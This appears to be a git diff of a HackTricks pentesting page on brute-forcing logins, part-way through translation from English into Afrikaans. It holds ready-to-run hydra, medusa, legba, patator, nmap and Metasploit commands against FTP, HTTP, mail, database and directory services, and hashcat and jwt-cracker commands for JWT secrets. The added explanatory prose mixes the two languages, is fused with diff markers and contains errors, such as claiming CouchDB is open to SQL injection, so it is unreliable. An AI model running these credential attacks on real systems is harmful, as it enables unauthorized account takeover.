```bash python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst - __ _______ _____ _______ ______ _____ - \ \ / /_ _|/ ____|__ __| ____| __ \ - \ \ /\ / / | | | (___ | | | |__ | |__) | - \ \/ \/ / | | \___ \ | | | __| | _ / - \ /\ / _| |_ ____) | | | | |____| | \ \ - \/ \/ |_____|_____/ |_| |______|_| \_\ +__ _______ _____ _______ ______ _____ +\ \ / /_ _|/ ____|__ __| ____| __ \ +\ \ /\ / / | | | (___ | | | |__ | |__) | +\ \/ \/ / | | \___ \ | | | __| | _ / +\ /\ / _| |_ ____) | | | | |____| | \ \ +\/ \/ |_____|_____/ |_| |______|_| \_\ + +Version 1.0.3 Cycurity - Version 1.0.3 Cycurity - Generating wordlist... [########################################] 100% Generated 67885 lines. Finished in 0.920s. ``` - ### [pydictor](https://github.com/LandGrey/pydictor) -### Wordlists +### Woordlyste * [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists) * [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) @@ -111,17 +105,16 @@ Finished in 0.920s.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Services +## Dienste -Ordered alphabetically by service name. +Alfabeties gerangskik volgens diensnaam. ### AFP - ```bash nmap -p 548 --script afp-brute msf> use auxiliary/scanner/afp/afp_login 
@@ -131,114 +124,235 @@ msf> set PASS_FILE msf> set USER_FILE msf> run ``` - ### AJP +AJP (Apache JServ Protocol) is a protocol used by Apache Tomcat to communicate with web servers. It is similar to the HTTP protocol but is more efficient for communication between the web server and the application server. + +AJP can be vulnerable to brute force attacks, where an attacker attempts to guess the correct username and password combination to gain unauthorized access to the application server. Brute force attacks can be performed using automated tools that systematically try different combinations until the correct one is found. + +To protect against AJP brute force attacks, it is important to implement strong authentication mechanisms, such as using complex passwords and enforcing account lockouts after a certain number of failed login attempts. Additionally, monitoring and logging failed login attempts can help detect and respond to brute force attacks in a timely manner. + +It is also recommended to regularly update and patch the software used for AJP communication to ensure any known vulnerabilities are addressed. Regular security assessments and penetration testing can help identify and mitigate any potential weaknesses in the AJP implementation. + +By following these best practices, organizations can reduce the risk of AJP brute force attacks and ensure the security of their application servers. ```bash nmap --script ajp-brute -p 8009 ``` +## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM en Solace) -## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace) +AMQP (Advanced Message Queuing Protocol) is 'n protokol wat gebruik word vir die uitruil van boodskappe tussen toepassings. Dit word dikwels gebruik in boodskapverspreidingsstelsels soos ActiveMQ, RabbitMQ, Qpid, JORAM en Solace. Hierdie platforms maak gebruik van AMQP om boodskappe te stuur en te ontvang. 
+### Brute Force-aanvalle op AMQP + +'n Brute Force-aanval op AMQP behels die poging om die regte gebruikersnaam en wagwoordkombinasie te raai om toegang tot die AMQP-stelsel te verkry. Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval op AMQP uit te voer: + +1. Woordelys-aanval: Hierdie metode behels die gebruik van 'n woordelys van algemene gebruikersname en wagwoordkombinasies om toegang te probeer verkry. Dit kan gedoen word met behulp van gereedskap soos Hydra of Medusa. + +2. Brute Force-aanval met aangepaste kombinasies: Hierdie metode behels die gebruik van 'n gereedskap soos Hydra of Medusa om aangepaste kombinasies van gebruikersname en wagwoorde te probeer. Dit kan nuttig wees as die standaard kombinasies nie suksesvol is nie. + +3. Woordeboek-aanval met aanpassings: Hierdie metode behels die gebruik van 'n woordelys van algemene woorde en die aanpassing van die woorde deur byvoorbeeld hoofletters, syfers of spesiale karakters by te voeg. Dit kan gedoen word met behulp van gereedskap soos John the Ripper of Hashcat. + +Dit is belangrik om te onthou dat brute force-aanvalle tydrowend kan wees en dat dit 'n groot hoeveelheid rekenaarhulpbronne kan vereis. Dit is ook belangrik om etiese hackingpraktyke te volg en slegs toestemming te verkry om 'n brute force-aanval uit te voer op 'n stelsel waarvoor jy bevoegd is om dit te doen. ```bash legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl] ``` - ### Cassandra +Cassandra is 'n gedistribeerde databasisstelsel wat ontwerp is om hoë beskikbaarheid en skaalbaarheid te bied vir groot hoeveelhede data. Dit is 'n NoSQL-databasis wat gebruik maak van 'n kolomgebaseerde model om data te stoor. Dit is bekend vir sy vermoë om groot hoeveelhede data te hanteer en hoë lees- en skryfvermoëns te bied. 
+ +#### Brute Force-aanvalle op Cassandra + +Brute force-aanvalle is 'n metode wat gebruik word om toegang te verkry tot 'n stelsel deur alle moontlike kombinasies van gebruikersname en wagwoorde te probeer. Hier is 'n paar bruto kragte tegnieke wat gebruik kan word om 'n Cassandra-databasis aan te val: + +1. **Woordelys-aanval**: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om toegang te verkry tot 'n Cassandra-databasis. Dit is belangrik om 'n uitgebreide woordelys te hê wat verskillende kombinasies van woorde, frases en getalle bevat. + +2. **Brute Force-aanval met aangepaste kombinasies**: Hierdie metode behels die gebruik van 'n program of skripsie om alle moontlike kombinasies van karakters vir gebruikersname en wagwoorde te genereer en te probeer. Dit kan 'n tydrowende proses wees, veral as die wagwoordlengte lank is. + +3. **Rainbow-tafelaanval**: Hierdie metode behels die gebruik van 'n vooraf berekende tafel met wagwoorde en hul ooreenstemmende hashowaardes om toegang te verkry tot 'n Cassandra-databasis. Dit kan 'n effektiewe metode wees as die oorspronklike wagwoorde nie sterk gehash is nie. + +Dit is belangrik om te verseker dat sterk wagwoorde gebruik word en dat die nodige veiligheidsmaatreëls geïmplementeer word om brute force-aanvalle op Cassandra te voorkom. ```bash nmap --script cassandra-brute -p 9160 # legba ScyllaDB / Apache Casandra legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042 ``` - ### CouchDB +CouchDB is 'n NoSQL databasis wat gebruik maak van 'n dokument-georiënteerde benadering. Dit is bekend vir sy veelsydigheid en skalerbaarheid. Hier is 'n paar brutaal kragtegnieke wat jy kan gebruik om toegang tot 'n CouchDB-databasis te verkry: + +#### 1. Standaard wagwoorde + +Baie gebruikers stel nie hul eie wagwoorde in vir hul CouchDB-databasisse nie. Dit beteken dat jy dalk toegang kan verkry deur die standaard wagwoord te gebruik. 
Dit is belangrik om te onthou dat dit slegs werk as die gebruiker nie 'n wagwoord ingestel het nie. + +#### 2. Woordelys-aanvalle + +'n Woordelys-aanval behels die gebruik van 'n lys algemene wagwoorde en kombinasies om toegang te verkry. Jy kan 'n woordelys van algemene wagwoorde vind en dit gebruik om te probeer om in te breek in die CouchDB-databasis. + +#### 3. Brute krag-aanvalle + +'n Brute krag-aanval behels die outomatiese poging om alle moontlike kombinasies van karakters te probeer totdat die regte wagwoord gevind word. Dit kan 'n tydrowende proses wees, maar dit kan suksesvol wees as die wagwoord nie sterk genoeg is nie. + +#### 4. SQL-injeksie + +As die CouchDB-databasis gebruik maak van 'n SQL-databasisagterkant, kan jy dalk 'n SQL-injeksie-aanval uitvoer om toegang te verkry. Hierdie aanval behels die invoeging van kwaadwillige SQL-kode in 'n invoerveld om die databasis te manipuleer. + +#### 5. Databasislekke + +Dit is belangrik om te kyk vir enige databasislekke wat dalk beskikbaar is op die internet. Jy kan soek na gelekte databasisse wat wagwoorde bevat wat ook in die CouchDB-databasis gebruik kan word. + +Onthou, dit is belangrik om etiese hackingpraktyke te volg en slegs toestemming te verkry om toegang tot 'n CouchDB-databasis te verkry. ```bash msf> use auxiliary/scanner/couchdb/couchdb_login hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get / ``` +### Docker Register -### Docker Registry +'n Docker Register is 'n stelsel wat gebruik word om Docker-beelde te stoor en te bestuur. Dit is 'n sentrale plek waar Docker-beelde geplaas en gedeel kan word. Dit is 'n nuttige hulpmiddel vir ontwikkelaars en operasionele spanne om Docker-beelde te organiseer en te bestuur. +'n Docker Register kan as 'n openbare register of 'n private register ingestel word. 'n Openbare register is toeganklik vir enigeen en word dikwels gebruik om openbare beelde te deel. 
'n Privaat register is beperk tot 'n spesifieke organisasie of groep en word gebruik om privaat beelde binne die organisasie te stoor en te deel. + +'n Docker Register kan ook sekuriteitstoegangsbeheer implementeer om te verseker dat slegs geakkrediteerde gebruikers toegang tot die beelde het. Dit kan ook funksies bied soos beeldversiesbeheer, beeldsleutelwoorde en beeldmetadata. + +Die mees algemene Docker Register is die Docker Hub, wat 'n openbare register is wat deur Docker self bedryf word. Daar is egter ook ander opsies beskikbaar, soos die gebruik van 'n private register soos die Google Container Registry of die opstel van 'n eie private register met behulp van sagteware soos Docker Registry of Harbor. ``` hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/ ``` - ### Elasticsearch +Elasticsearch is 'n oopbron, gedistribueerde soekenjin wat gebruik maak van Apache Lucene om vinnige en skaalbare soektogte na gestruktureerde en ongestruktureerde data te bied. Dit is 'n baie gewilde keuse vir die indeksering en soektog van groot hoeveelhede data, soos loglêers, metodes, dokumente en meer. Elasticsearch bied 'n kragtige soektaal en 'n ryk stel funksies wat dit 'n waardevolle hulpmiddel maak vir die hantering van data-analise en soektogte in 'n verskeidenheid toepassings. ``` hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get / ``` - ### FTP +FTP (File Transfer Protocol) is 'n protokol wat gebruik word vir die oordrag van lêers tussen rekenaars op 'n netwerk. Dit is 'n algemene metode vir die oordrag van lêers tussen 'n kliënt en 'n bediener. FTP maak gebruik van 'n gebruikersnaam en wagwoord vir verifikasie en maak gebruik van 'n reeks opdragte om die oordrag van lêers te beheer. 
+ +#### Brute Force-aanval op FTP + +'n Brute Force-aanval op FTP is 'n metode waar 'n aanvaller probeer om toegang tot 'n FTP-bedieners te verkry deur verskeie kombinasies van gebruikersname en wagwoorde te probeer. Die aanvaller gebruik 'n program of skripsie om outomaties die kombinasies te probeer totdat die regte kombinasie gevind word. + +Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval op FTP uit te voer: + +1. Woordelys-aanval: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om te probeer om toegang tot die FTP-bedieners te verkry. Die aanvaller gebruik 'n program of skripsie om elke wagwoord in die woordelys te probeer totdat die regte wagwoord gevind word. + +2. Brute Force-aanval met behulp van 'n woordelys en regels: Hierdie metode behels die gebruik van 'n woordelys van wagwoorde, sowel as spesifieke reëls om die wagwoorde te verander. Byvoorbeeld, die aanvaller kan reëls soos die vervanging van letters met syfers of die toevoeging van spesiale karakters gebruik. Hierdie metode verhoog die aantal moontlike kombinasies wat probeer word. + +3. Brute Force-aanval met behulp van 'n aangepaste woordelys: Hierdie metode behels die gebruik van 'n aangepaste woordelys wat spesifiek is vir die teiken. Die aanvaller kan inligting soos gebruikersname, e-posadressse of enige ander relevante inligting insluit om die wagwoorde te raai. + +Dit is belangrik om te onthou dat 'n brute force-aanval op FTP 'n tydrowende proses kan wees, veral as die wagwoord sterk en lang is. Dit is ook belangrik om sterk wagwoorde te gebruik en om sekuriteitsmaatreëls soos tweeledige verifikasie te implementeer om die risiko van 'n suksesvolle brute force-aanval te verminder. 
```bash hydra -l root -P passwords.txt [-t 32] ftp ncrack -p 21 --user root -P passwords.txt [-T 5] medusa -u root -P 500-worst-passwords.txt -h -M ftp legba ftp --username admin --password wordlists/passwords.txt --target localhost:21 ``` - -### HTTP Generic Brute +### HTTP Generiese Brute #### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md) -### HTTP Basic Auth - +### HTTP Basiese Auth ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/ # Use https-get mode for https medusa -h -u -P -M http -m DIR:/path/to/auth -T 10 legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/ ``` - ### HTTP - NTLM +NTLM (New Technology LAN Manager) is an authentication protocol used in Windows environments. It is commonly used for HTTP authentication, allowing users to access web applications and services. + +#### Brute-Forcing NTLM Credentials + +To perform a brute-force attack on NTLM credentials, you can use tools like `Medusa` or `Hydra`. These tools allow you to automate the process of trying different username and password combinations until a valid set of credentials is found. + +Here is an example command using `Medusa` to brute-force NTLM credentials: + +```plaintext +medusa -h -u -P -M http -m AUTH:NTLM -T 10 +``` + +- ``: The IP address of the target machine. +- ``: A file containing a list of usernames to try. +- ``: A file containing a list of passwords to try. +- `-M http`: Specifies the protocol to use (HTTP). +- `-m AUTH:NTLM`: Specifies the authentication method to use (NTLM). +- `-T 10`: Specifies the number of threads to use (10 in this example). + +#### Protecting Against Brute-Force Attacks + +To protect against brute-force attacks on NTLM credentials, you can implement the following measures: + +1. 
Enforce strong password policies: Require users to choose complex passwords that include a combination of uppercase and lowercase letters, numbers, and special characters. Additionally, enforce password expiration and prevent password reuse. + +2. Implement account lockout policies: Set up account lockout thresholds to temporarily lock user accounts after a certain number of failed login attempts. This can help prevent brute-force attacks by slowing down the attacker's progress. + +3. Monitor and analyze logs: Regularly review logs for any suspicious activity, such as multiple failed login attempts from the same IP address. This can help identify and mitigate brute-force attacks in real-time. + +By implementing these measures, you can significantly reduce the risk of successful brute-force attacks on NTLM credentials. ```bash legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/ legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/ ``` +### HTTP - Pos Vorm -### HTTP - Post Form +Brute force is 'n aanvalstegniek wat gebruik word om toegang te verkry tot 'n stelsel deur herhaaldelik verskillende wagwoorde of gebruikersname te probeer. Hierdie tegniek kan gebruik word om toegang te verkry tot 'n webwerf wat 'n posvorm gebruik om inligting te verifieer. +Die eerste stap in 'n brute force-aanval op 'n HTTP-posvorm is om die HTTP-aanvraag te analiseer wat deur die vorm gestuur word. Die aanvraag sal 'n spesifieke URL hê, gewoonlik die URL van die posvorm self. Dit sal ook 'n spesifieke metode hê, gewoonlik 'POST', wat aandui dat die vormdata gestuur moet word. + +Die volgende stap is om 'n lys van moontlike wagwoorde of gebruikersname te genereer. Hierdie lys kan bestaan uit algemene wagwoorde, woordelyswoorde of selfs persoonlike inligting oor die teiken. 
Dit is belangrik om 'n lys te hê wat so volledig as moontlik is, aangesien die sukses van die brute force-aanval afhang van die korrek raai van die regte wagwoord of gebruikersnaam. + +Die brute force-aanvaller sal dan elke wagwoord-gebruikersnaam-kombinasie van die lys probeer deur dit in die posvormdata in te voer en die HTTP-aanvraag te stuur. As die wagwoord-gebruikersnaam-kombinasie korrek is, sal die webwerf 'n suksesvolle verifikasie terugstuur, wat aandui dat die toegang verkry is. As die kombinasie ongeldig is, sal die webwerf 'n foutboodskap of 'n onsuksesvolle verifikasie terugstuur. + +Die brute force-aanval kan voortgaan totdat die regte wagwoord-gebruikersnaam-kombinasie gevind is, of totdat 'n bepaalde tydlimiet bereik is. Dit is belangrik om op te let dat brute force-aanvalle tydrowend kan wees en dat dit 'n groot hoeveelheid pogings kan neem voordat die regte kombinasie gevind word. + +Daar is verskeie tegnieke en hulpmiddels beskikbaar om brute force-aanvalle uit te voer. Dit sluit in outomatiese hulpmiddels wat wagwoorde en gebruikersname outomaties probeer, en hulpmiddels wat spesifiek ontwerp is vir die aanval van HTTP-posvorme. + +Dit is belangrik om te onthou dat brute force-aanvalle onwettig is en dat dit slegs gebruik moet word met toestemming van die eienaar van die teikenstelsel. 
```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V # Use https-post-form mode for https ``` +Vir http**s** moet jy verander van "http-post-form" na "**https-post-form**" -For http**s** you have to change from "http-post-form" to "**https-post-form"** - -### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle - +### **HTTP - CMS --** (W)ordpress, (J)oomla of (D)rupal of (M)oodle ```bash cmsmap -f W/J/D/M -u a -p a https://wordpress.com # Check also https://github.com/evilsocket/legba/wiki/HTTP ``` - ### IMAP +IMAP (Internet Message Access Protocol) is 'n protokol wat gebruik word om e-posboodskappe te ontvang en te stoor op 'n e-posbediener. Dit maak dit moontlik vir gebruikers om toegang tot hul e-posrekeninge te verkry en e-posboodskappe te lees vanaf enige toestel wat met die internet verbind is. + +IMAP ondersteun verskillende funksies, soos die sien van 'n lys van e-posboodskappe in 'n posbus, die lees van e-posboodskappe, die stuur van nuwe e-posboodskappe, die uitvee van e-posboodskappe en die skep van nuwe posbusse. Dit maak ook gebruik van 'n stelsel van mappen om e-posboodskappe te organiseer en te kategoriseer. + +'N Brute force-aanval op 'n IMAP-bediener behels die gebruik van 'n program of skripsie om verskeie kombinasies van gebruikersname en wagwoorde te probeer om toegang tot 'n e-posrekening te verkry. Hierdie aanvalsmetode kan gebruik word om swak wagwoorde te identifiseer en toegang tot 'n rekening te verkry sonder die korrekte legitimasie. + +Dit is belangrik om sterk wagwoorde te gebruik en tweestapsverifikasie in te stel om die risiko van 'n suksesvolle brute force-aanval te verminder. 
```bash hydra -l USERNAME -P /path/to/passwords.txt -f imap -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f imap -V nmap -sV --script imap-brute -p legba imap --username user --password data/passwords.txt --target localhost:993 ``` - -### IRC - +IRC (Internet Relay Chat) is 'n kommunikasieprotokol wat gebruik word vir real-time gesprekke oor die internet. Dit maak gebruik van 'n klient-bedieners model, waar gebruikers 'n IRC-klient gebruik om met 'n IRC-bediener te verbind. IRC-kanale word gebruik om gesprekke te organiseer en te fasiliteer, en gebruikers kan boodskappe stuur en ontvang binne hierdie kanale. IRC word dikwels gebruik vir gemeenskapsgebaseerde gesprekke, soos in openbare IRC-kanale of in privaatgroepgesprekke. ```bash nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p ``` - ### ISCSI +iSCSI (Internet Small Computer System Interface) is 'n protokol wat gebruik word om SCSI-opdragte oor 'n IP-netwerk te stuur. Dit maak dit moontlik om 'n blokgebaseerde toegang tot stoorplek oor 'n netwerk te verkry. iSCSI maak gebruik van TCP/IP-protokolle om SCSI-opdragte te verpak en oor te dra oor 'n IP-netwerk. Dit bied 'n koste-effektiewe en maklik implementeerbare oplossing vir die koppel van stoorplekbronne oor lang afstande. ```bash nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 ``` - ### JWT +JWT (JSON Web Tokens) is 'n openbare standaard (RFC 7519) wat gebruik word vir die veilige oordrag van inligting tussen partye as 'n JSON-voorwerp. Dit word dikwels gebruik vir die verifikasie en outentisering van gebruikers in webtoepassings en API's. + +'n JWT bestaan uit drie dele: 'n header, 'n payload en 'n handtekening. Die header bevat inligting oor die tipe token en die gebruikte algoritme. Die payload bevat die nuttige inligting wat oorgedra word, soos gebruikersinligting of toegangsregte. 
Die handtekening word gebruik om die integriteit van die token te verseker en te verseker dat dit nie gewysig is nie. + +Brute force-aanvalle kan gebruik word om die geheime sleutel te agterhaal wat gebruik word om die JWT te onderteken. Dit behels die outomatiese poging van verskillende moontlike sleutels totdat die regte een gevind word. Hierdie aanval kan tydrowend wees, veral as die sleutel sterk en lang is. + +Om te voorkom dat JWT's deur brute force-aanvalle gekraak word, is dit belangrik om sterk en unieke sleutels te gebruik. Dit kan ook nuttig wees om maatreëls te implementeer soos beperkte pogings, waar die toepassing na 'n sekere aantal mislukte pogings tydelik blokkeer. ```bash #hashcat hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt 
@@ -261,37 +375,75 @@ python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1w #https://github.com/lmammino/jwt-cracker jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6 ``` - ### LDAP +LDAP (Lightweight Directory Access Protocol) is 'n protokol wat gebruik word om toegang te verkry tot en te kommunikeer met 'n directory-diens. Dit word dikwels gebruik in netwerke om gebruikersinligting en -hulpbronne te organiseer en te versprei. LDAP-bruteforcing is 'n tegniek wat gebruik word om toegang te verkry tot 'n LDAP-diens deur verskeie gebruikersname en wagwoorde te probeer totdat 'n geldige kombinasie gevind word. Hierdie tegniek kan gebruik word om swakke wagwoordbeleide te identifiseer en om toegang te verkry tot beskermde hulpbronne. ```bash nmap --script ldap-brute -p 389 legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match ``` - ### MQTT +MQTT (Message Queuing Telemetry Transport) is 'n ligewig, eenvoudige en betroubare protokol wat gebruik word vir die uitruil van boodskappe tussen toestelle. Dit is ontwerp vir die effektiewe kommunikasie tussen toestelle in 'n netwerk met beperkte hulpbronne, soos sensore en aktuators in die Internet of Things (IoT)-omgewing. + +MQTT maak gebruik van 'n publish-subscribe-model, waar toestelle boodskappe kan publiseer en inteken op spesifieke onderwerpe. Die protokol maak gebruik van 'n TCP/IP-verbinding en maak gebruik van minimale bandwydte en hulpbronverbruik. Dit maak dit ideaal vir toepassings waar energiebesparing en netwerkbeperkings belangrik is. + +Die veiligheid van MQTT kan verbeter word deur gebruik te maak van versleuteling en outentisering. Dit kan ook blootstelling aan aanvalle soos brute krag-aanvalle voorkom. 
Brute krag-aanvalle is 'n tegniek waar 'n aanvaller probeer om toegang te verkry tot 'n stelsel deur alle moontlike kombinasies van wagwoorde of sleutels te probeer. + +Om 'n brute krag-aanval teen MQTT te voorkom, kan maatreëls soos die gebruik van sterk wagwoorde, die beperking van die aantal foute pogings en die gebruik van outentiseringsmetodes soos TLS/SSL geïmplementeer word. Dit is ook belangrik om die MQTT-bediener op te dateer met die nuutste veiligheidsopdaterings om bekende kwesbaarhede te voorkom. + +As 'n hacker is dit belangrik om bewus te wees van die moontlikheid van brute krag-aanvalle teen MQTT en om sekuriteitsmaatreëls te implementeer om die risiko te verminder. ``` ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v -legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt +legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt ``` - ### Mongo +#### Brute Force + +Brute force is a common technique used to gain unauthorized access to a MongoDB database. It involves systematically trying all possible combinations of usernames and passwords until the correct credentials are found. + +To perform a brute force attack on a MongoDB database, you can use tools like Hydra or Medusa. These tools allow you to automate the process of trying different combinations of usernames and passwords. + +Before attempting a brute force attack, it is important to gather information about the target MongoDB database. This includes identifying the MongoDB version, the authentication mechanism used, and any default usernames or passwords that may be present. + +Once you have gathered this information, you can start the brute force attack by specifying the target MongoDB server, the list of usernames to try, and the list of passwords to try. The tool will then systematically try each combination until it finds the correct credentials. 
+ +To increase the chances of success, it is recommended to use a large wordlist for usernames and passwords. These wordlists can be obtained from various sources, such as leaked databases or password cracking forums. + +It is important to note that brute forcing a MongoDB database is illegal and unethical unless you have explicit permission from the owner to perform the attack. Always ensure that you are conducting any hacking activities within the boundaries of the law and with proper authorization. ```bash nmap -sV --script mongodb-brute -n -p 27017 use auxiliary/scanner/mongodb/mongodb_login legba mongodb --target localhost:27017 --username root --password data/passwords.txt ``` - ### MSSQL +MSSQL, of Microsoft SQL Server, is 'n relationele databasisbestuurstelsel wat deur Microsoft ontwikkel is. Dit word algemeen gebruik vir die stoor en bestuur van data in besigheidsomgewings. + +#### Brute Force-aanvalle teen MSSQL + +'n Brute Force-aanval teen MSSQL behels die poging om toegang te verkry tot 'n MSSQL-databasis deur verskeie moontlike kombinasies van gebruikersname en wagwoorde te probeer. Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval teen MSSQL uit te voer: + +1. **Woordelys-aanval**: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om toegang te verkry tot 'n MSSQL-databasis. Die aanvaller sal elke wagwoord in die woordelys probeer totdat 'n suksesvolle trefslag bereik word. + +2. **Brute Force-aanval met aangepaste wagwoordlys**: In hierdie geval sal die aanvaller 'n aangepaste wagwoordlys gebruik wat spesifiek ontwerp is vir die doelwit MSSQL-databasis. Hierdie wagwoordlys kan bestaan uit kombinasies van algemene wagwoorde, gebruikersname, en ander relevante inligting. + +3. **Hybride aanval**: 'n Hybride aanval is 'n kombinasie van 'n woordelys-aanval en 'n brute force-aanval met aangepaste wagwoordlys. 
Dit behels die gebruik van 'n woordelys, gevolg deur die gebruik van aangepaste wagwoorde om toegang te verkry tot die MSSQL-databasis. + +Dit is belangrik om te verseker dat sterk wagwoorde gebruik word en dat die MSSQL-databasis behoorlik beveilig is teen brute force-aanvalle. ```bash legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433 ``` - ### MySQL +MySQL is 'n open-source relationele databasisbestuurstelsel wat gebruik word om data te stoor en te bestuur. Dit is baie gewild in die webontwikkelingsgemeenskap en word dikwels gebruik in kombinasie met PHP om dinamiese webtoepassings te bou. + +MySQL maak gebruik van 'n gebruikersnaam en wagwoord om toegang tot die databasis te beperk. 'n Brute force-aanval is 'n tegniek wat gebruik word om toegang tot 'n MySQL-databasis te verkry deur verskeie kombinasies van gebruikersname en wagwoorde te probeer. Hierdie aanval is baie tydrowend, maar kan suksesvol wees as die regte kombinasie gevind word. + +Daar is verskeie hulpmiddels en tegnieke beskikbaar om 'n brute force-aanval op 'n MySQL-databasis uit te voer. Een van die gewildste hulpmiddels is 'Hydra', wat 'n aanval kan uitvoer deur verskeie wagwoorde te probeer vir 'n gegewe gebruikersnaam. Dit kan ook gebruik word om 'n woordelys-aanval uit te voer, waar dit 'n lys van moontlike wagwoorde deurloop om toegang te verkry. + +Dit is belangrik om te verseker dat sterk wagwoorde gebruik word en dat die MySQL-databasis korrek geïnstalleer en gekonfigureer is om die risiko van 'n brute force-aanval te verminder. Dit sluit in die gebruik van lang en komplekse wagwoorde, die beperking van toegang tot die databasis, en die monitering van verdagte aktiwiteit. ```bash # hydra hydra -L usernames.txt -P pass.txt mysql 
@@ -305,9 +457,19 @@ medusa -h -u -P <-f | to stop medusa on fir #Legba legba mysql --username root --password wordlists/passwords.txt --target localhost:3306 ``` - ### OracleSQL +Brute force is a technique used to crack passwords or gain unauthorized access to systems by systematically trying all possible combinations of passwords until the correct one is found. In the context of OracleSQL, brute force attacks can be used to guess the passwords of Oracle database users. + +To perform a brute force attack on an Oracle database, you can use tools like Hydra or Medusa. These tools allow you to automate the process of trying different passwords against a target Oracle database. + +Before attempting a brute force attack, it is important to gather information about the target Oracle database, such as the username and the Oracle SID (System Identifier). This information can be obtained through reconnaissance techniques like port scanning or banner grabbing. + +Once you have the necessary information, you can start the brute force attack by specifying the target Oracle database, the username, and a password list. The tools will then systematically try each password in the list until the correct one is found or all passwords have been exhausted. + +To increase the chances of success, it is recommended to use a large and diverse password list. This can include common passwords, dictionary words, and variations of known passwords. Additionally, you can also use password cracking techniques like hybrid attacks, which combine dictionary words with common patterns or modifications. + +It is important to note that brute force attacks can be time-consuming and resource-intensive. They can also be detected by intrusion detection systems or trigger account lockouts if too many failed login attempts are made. Therefore, it is crucial to use caution and obtain proper authorization before attempting any brute force attacks. 
```bash patator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017 
@@ -331,21 +493,21 @@ nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid= legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt ``` - -In order to use **oracle\_login** with **patator** you need to **install**: - +Om **oracle\_login** met **patator** te gebruik, moet jy dit **installeer**: ```bash pip3 install cx_Oracle --upgrade ``` - -[Offline OracleSQL hash bruteforce](../network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** and **11.2.0.3**): - +[Aflynser OracleSQL-hash bruteforce](../network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**weergawes 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** en **11.2.0.3**): ```bash - nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 +nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 ``` - ### POP +POP (Post Office Protocol) is 'n protokol wat gebruik word om e-pos van 'n e-posbediener af te haal en te lees. Dit is 'n algemene metode vir toegang tot e-posrekeninge en word dikwels gebruik deur e-poskliënte soos Outlook en Thunderbird. + +Brute force-aanvalle kan gebruik word om POP-wagwoorde te kraak deur verskillende kombinasies van gebruikersname en wagwoorde te probeer totdat die regte kombinasie gevind word. Dit kan gedoen word deur 'n woordelys van algemene wagwoorde te gebruik of deur 'n 